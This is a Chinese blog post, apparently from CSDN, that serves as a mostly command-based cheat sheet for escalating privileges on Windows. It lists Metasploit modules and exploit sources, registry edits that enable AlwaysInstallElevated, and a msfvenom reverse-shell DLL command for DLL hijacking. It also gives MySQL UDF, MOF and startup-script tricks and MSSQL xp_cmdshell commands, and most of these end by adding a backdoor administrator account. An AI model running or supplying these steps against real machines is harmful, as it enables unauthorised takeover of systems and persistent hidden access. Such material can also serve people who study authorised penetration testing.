windows提权

最新推荐文章于 2024-07-10 17:08:52 发布
最新推荐文章于 2024-07-10 17:08:52 发布
阅读量297 收藏
点赞数
分类专栏: 权限 文章标签: windows 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53396158/article/details/127371547
版权

windows提权

windows安全要素

  • Token
  • password
  • 安全描述符(SID和ACL组成)
    • SID
    • 组SID
    • DACL任意访问控制列表,如果没有此表说明任何对象可访问
    • SACL系统访问控制列表,指出存取方式(读、写、运行等)细节
  • SID 如S-1-5-21-310440588-250036847-580389505-500
    • 遵循模式S-R-IA_SA_SA_SA_RID
    • S指明这是SID
    • R是修订级别为1
    • IA代表颁发机构ID编号为21
    • SA代表子机构
    • RID代表相对ID是SA指派的独立ID
  • ACL(访问控制列表)

内核提权

找到对应版本可利用漏洞直接利用

#MSF利用
post/windows/gather/enum_patches			#查补丁

post/multi/recon/local_exploit_suggester	#查exp

#对照系统版本找exp
https://github.com/SecWiki/windows-kernel-exploits
https://bugs.hacking8.com/tiquan/
https://github.com/Heptagrams/Heptagram/tree/master/Windows/Elevation
https://www.exploit-db.com/
https://i.hacking8.com/tiquan/

系统配置错误提权

系统自动运行的一些服务权限较高,可替换服务文件

#msf利用
exploit/windows/local/service_permissions         #权限劫持

没有双引号导致运行被劫持

#msf利用
set AutoRunScript migrate -f                      #自动迁移进程

注册键AlwaysInstallElevated允许其他用户以system权限安装文件

#cmd
#查看是否开启
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
#查看权限SeRestorePrivilege和SeTakeOwnershipPrivilege
whoami /priv			
#开启AlwaysInstallElevated
reg add HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1

网管一键安装配置文件可能泄露管理员密码

#cmd
dir /b /s c:\Unattend.xml
#msf
post/windows/gather/enum_unattend  #对此配置文件扫描

本地dll劫持 优先加载程序文件目录

#dll加载顺序
应用程序目录
c:\windows\System32
c:\window\System
c:\windows
当前工作目录
PATH(先System后User)
#火绒剑找位置文件或数字签名文件
msfvenom -p windows/meterpreter/reverse_tcp lhost=ip lport=port -f dll > lib.dll

第三方提权

mysql提权

想办法拿到root密码

  1. 查找数据库配置文件

    关键字:configconnsqldataincdatabase

  2. 下载mysql安装路径下的数据文件

    • 安装路径下的data目录中存放的是数据库的数据信息
    • root账号密码存储在mysql数据库下的user表中
    • 完整路径=安装路径+\data\mysql\user.MYD

  3. 暴力破解

udf提权

用户自定函数
udf.dll文件在windows2003下放在:c:\windows\system32 在windows2000放在:c:\winnt\system32
mysql5.1之后放/lib/plugin 文件后缀dll

#查看plugin目录
show variables  like "%plugin%"                   
#在my.ini添加 secure-file-priv= 保存重启mysql即可
SELECT @@global.secure_file_priv
#把udf.dll导出指定文件夹引入mysql,调用cmd函数的”udf.dll”
create function cmdshell returns string soname 'udf.dll'; 
#执行cmdshell
select cmdshell('net user actist 123456 /add');
select cmdshell('net localgroup administrators actist /add');
#删除cmd函数
drop function cmdshell;
mof提权

对象托管格式 每五秒监控进程创建和死亡

#03及以下;
#有权限读写c:\windows\system32\wbem\mof目录; 
#secure-file-priv=
#导入恶意mof
select load_file('C:/www/nullevt.mof') into dumpfile 'C:/Windows/System32/wbem/MOF/nullevt.mof'

#msf
use exploit/windows/mysql/mysql_mof
#允许外联可以直接打
启动项提权
#2003目录
C:\Documents and Settings\Administrator\Start Menu\Programs\Startup
C:\Documents and Settings\All Users\Start Menu\Programs\Startup
#2008目录
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
#写入a.vbs执行代码
create table a (cmd text); 
insert into a values ("set wshshell=createobject (""wscript.shell"") " ); 
insert into a values ("a=wshshell.run (""cmd.exe /c net user suifeng p@ssw0rd /add"",0) " ); 
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators suifeng /add"",0) " ); 
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
mssql提权

xp_cmdshell被删除可以使用sp_oacreate,自行百度

#从敏感文件带conn,data,config,web等词的找sa密码
web.config/config.asp/conn.aspx/database.aspx
#开启xp_cmdshell
Exec sp_configure 'show advanced options',1;reconfigure;	#允许修改高级参数
exec sp_configure 'xp_cmdshell',1;reconfigure;				#打开xp_cmdshell
#添加系统用户
Exec master.dbo.xp_cmdshell 'net user act 123456 /add & net localgroup administrators act /add'
Oracle提权

定义者权限给了某些情况下调用者使用定义者权限的机会,无论调用者是谁,执行存储过程的结果权限为定义者权限

和linux提权中的suid原理类似

oracle执行Java代码的过程

1、创建Java库

2、赋予Java权限

3、创建函数

4、赋予函数执行权限

5、执行

#SYS创建的存储过程存在sql注入(EG:CVE-2005-4832); 用户拥有create procedure权限(用来创建函数)
auxiliary/sqli/oracle/dbms_cdc_subscribe.activate_subscription
G6 FTP提权

默认端口8021,

#查看密码解密
C:\Program Files (x86)\Gene6 FTP Server\RemoteAdmin\Remote.ini
#无法外部访问,做端口转发
lcx.exe -tran 2333 127.0.0.1 8021
#攻击端下载ftp管理工具登录在用户设置中植入bat代码文件并执行
net user act QWEasd123 /add && net localgroup administrators act /add
#和启动项一样,重启时自动执行

bypassuac

uac是用户账户控制,弹框用户点击确认授权

#msf
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection

msf开3389

run getgui -e
actistsec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows提权
qq_46258964的博客
01-10 2791
Windows权限分为四种 user: 普通用户权限 administrator::管理员权限 system 系统权限 TrustedInstaller:Windows中最高权限。有些文件,连System权限也无法修改。 通过getshell拿到权限之后,权限比较低什么事情的干不了, 我们就要提权到administrator或者更高的system权限。 前期可以上传扫描脚本判断出内核漏洞或者系统漏洞,直接利用漏洞提权是最好的方法。 常见的提权信息收集脚本: vulmap, Wes,WindowsVulnSc
windows提权工具
01-15
可以对win2K3-win2012 server进行提权 win7也可以,win10没试过
[提权] 使用 ShellCode 注入其他进程
LYSM
11-27 989
背景 如果将shellcode注入到具有特定权限的进程中,使用 ShellCode 创建的进程就可以获得与该进程相同的权限。 本次使用的工具,依旧是上次编写的PETools: https://www.cnblogs.com/LyShark/p/12960816.html 提权降权工具下载地址: https://www.blib.cn/soft/pexec.zip 枚举系统进程,与进程权限令牌等。 #include <stdio.h> #include <Windows.h> #inc
Cobalt Strike四种提权方法
m0_60870041的博客
12-13 1378
肥肠好用的工具 —— cs
一段像屎一样的在pyside2下的windows提权代码
qq_47767419的博客
06-02 155
代码】一段像屎一样的pyside2下的windows提权代码
内网渗透(二)之提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-14 5575
对于内网渗透,到我们拿到了公网主机的权限后,并获得了一些本机的信息时。我们首先得知道我们的权限。如果获取到的是普通用户权限,则我们需要想办法提权至管理员权限。如果获得的已经是管理员权限,则可以忽略这一步。对于Windows系统,只有提权到管理员权限后,才可以运行mimikatz以及执行一些其他高权限的操作。对于Linux系统,很多命令需要root权限才能执行,只有提权到root权限才能执行后面的信息收集等工作。
Windows系统提权简单总结
Aiwin的博客
07-13 1817
Windows系统提权简单总结
windows提权-快速查找exp(第一课).docx
04-26
Windows提权与APT攻防】\n\n在网络安全领域,Windows系统的权限提升(Privilege Escalation)是攻击者常用的手段之一,用于获取系统更高级别的访问权限。本篇将详细讲解如何快速查找并利用公开的exploit(漏洞利用...
windows&linux;提权总结
04-24
windows&linux;提权总结,套路,套路,套路,套路套路,套路,套路,。
linux提权代码
06-04
linux提权代码集合一共有一百多个左右
windows提权漏洞
08-02
提权漏洞
yyctf#study#windows提权1
07-25
nmap 扫描445端口是否开启net localgroup administrators xxxx /add(将用户设置为管理员权限)set target 1
windows程序提权方法
热门推荐
sowhat_Ah的专栏
02-04 2万+
Windows下应用程序如果需要做一些系统管理或进程管理之类的工作,经常需要将本进程提权(获取权限令牌); 而通常windows提权方法有两种,主要的方法是: 1)win32API——AdjustTokenPrivileges; 2)ntdll.dll——RtlAdjustPrivilege; 前者是已公开的win32系统API,后者是非公开的导出函数(藏在ntdll.dll里); 两
Windows提权---DLL注入/不带引号的服务路径/注册表
qq_40012781的博客
07-03 1027
DLL注入提权、不带引号的服务路径提权、注册表提权
linux 小马 提权指令,Linux 提权常用命令集(示例代码)
weixin_42519725的博客
05-12 239
0x00 操作系统相关操作系统类型版本cat /etc/issuecat /etc/*-releasecat /etc/lsb-release # Debiancat /etc/redhat-release # Redhat内核版本,是否是64位cat /proc/versionuname -auname -mrsrpm -q kerneldmesg | grep Linuxls /boot | ...
Windows 修改某个服务的可执行文件路径
weixin_41793990的博客
02-24 2368
step1:快捷键 Win+ R ,输入regedit 点击确定打开注册表 step2: 依此点击 HKEY_LOCAL_MACHINE >>SYSTEM >>CurrentControlSet>> Services step3: 找到对应的服务名称(输入法英文状态下,可筛选Services 服务名) step4 : 点击服务名,右边栏找到名称为...
java 中钻石操作符 <> 的使用场景
最新发布
qq_27390023的博客
07-10 467
钻石操作符在 Java 中的主要作用是简化泛型类型的实例化,减少代码冗余,使代码更加简洁和可读。它通过类型推断机制,让编译器自动推断出类型参数,而不需要程序员显式地重复类型参数。这样不仅减少了代码量,还减少了出错的可能性。
windows 提权
08-27
Windows提权是指获取管理员权限或系统级权限的过程。在某些情况下,普通用户需要提升权限以执行某些操作或访问受限资源。 有几种常见的Windows提权方法,包括: 1. 利用已知漏洞:Windows系统中可能存在一些未修补...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值